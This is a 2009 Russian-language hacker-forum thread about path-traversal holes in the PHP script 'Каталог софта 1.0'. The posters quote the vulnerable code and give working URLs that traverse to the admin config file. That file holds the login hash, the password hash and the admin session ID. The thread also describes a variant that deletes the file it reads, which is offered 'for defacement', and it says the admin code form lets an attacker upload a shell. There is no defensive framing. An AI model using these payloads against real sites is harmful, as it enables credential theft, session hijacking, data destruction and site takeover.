Уязвимости Каталог софта 1.0

Discussion in 'Веб-уязвимости' started by FriLL, 1 Sep 2009.

  1. FriLL

    FriLL Member

    Joined:
    14 Sep 2008
    Messages:
    90
    Likes Received:
    24
    Reputations:
    8
    Скрипт с сайта homescript.ru


    Уязвимый код

    PHP:
     $file=file("db/autor/$_GET[id].txt");

              foreach(    $file as $line)
                         {
                               $line=trim($line);
                               $expl=explode("*",$line);

                           if(    file_exists("db/$expl[0]/$expl[1].txt"))$path="db";
                           else     $path="db/pre_prog";

                               $file_new=file("$path/$expl[0]/$expl[1].txt");
                               $file_new[0]=trim($file_new[0]);
                               $file_new[1]=trim($file_new[1]);
                               $file_new[8]=trim($file_new[8]);
                               $file_new[10]=trim($file_new[10]);
                               $file_new[11]=trim($file_new[11]);
                           echo     "<table width=80% style=\"border-bottom:$conf[69]px $conf[70] $conf[68]\" align=center>
                                      <tr>
                                         <td id=zip_head_prog_news>    $file_new[1]";
                                              $stat=array();
                                                   $stat=file("db/stat/$expl[1].txt");
                                                   $stat=explode("*",$stat[0]);
                                               if(    $stat[0]!=0)
                                                {
                                                      $itog=ceil($stat[1]/$stat[0]);
                                                  for(    $n=0;$n<$itog;$n++)echo "<img src=img/star.jpg border=0>";
                                                }
                                     echo     "</td>
                                      </tr>
                                      <tr>
                                         <td id=zip_text_news>    $file_new[8]</td>
                                      </tr>
                                      <tr>
                                         <td id=zip_text_news><span id=zip_dat_news>    $file_new[10]</span></td>
                                      </tr>
                                      </table><br />"    ;

                         }


    те читалка через file()

    читаем конфиги (права админа не нужны)
    admin/autor_prog.php?id=../../admin/conf/conf

    Вывод идет в перемешку с error-ами
    но прочесть это не мешает

    в конфигах 3 строки
    1) хеш логина
    2) хеш пароля
    3) идентификатор сессии админа
     
    #1 FriLL, 1 Sep 2009
    Last edited: 1 Sep 2009
    2 people like this.
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Ну давай дальше пойдем :)

    файл autor_del

    PHP:
    //Программы
               $file=array();
                  $file=file("db/autor/$_GET[id].txt");
              foreach(    $file as $line)
            {
                   $line=trim($line);
                   $expl=explode("*",$line);
                   $cat_id[]=$expl[0];
                   $prog_id[]=$expl[1];
            }
    получается мы реализуем так:

    http://127.0.0.1/file_zip/admin/autor_del.php?id=../../admin/conf/conf

    но нас кидает на admin/index.php , затем просто возвращаем назад страницы и видим

    Warning: file(db/autor/'.txt) [function.file]: failed to open stream: No such file or directory in C:\xampp\htdocs\file_zip\admin\autor_del.php on line 26

    PS так пойдет? таже самая реализация, если не понятно напишу не просто кавычку

    ЗЫ ну увидиш их зато в последний раз :) и если так подумать то это не уязвимость?в плане сделать не хорошо
     
    _________________________
    #2 HAXTA4OK, 1 Sep 2009
    Last edited: 1 Sep 2009
  3. FriLL

    FriLL Member

    Joined:
    14 Sep 2008
    Messages:
    90
    Likes Received:
    24
    Reputations:
    8
    и причем тут autor_del.php ??
    (autor_del удаляет читаемый файл так что не
    рекомендую его использовать)
    s55.radikal.ru/i150/0909/c0/f728c908575c.jpg

    разве что для дефейса сойдет


    между прочим в админке форма управения кодом,
    так что залить шел не проблема
     
    #3 FriLL, 1 Sep 2009
    Last edited: 1 Sep 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.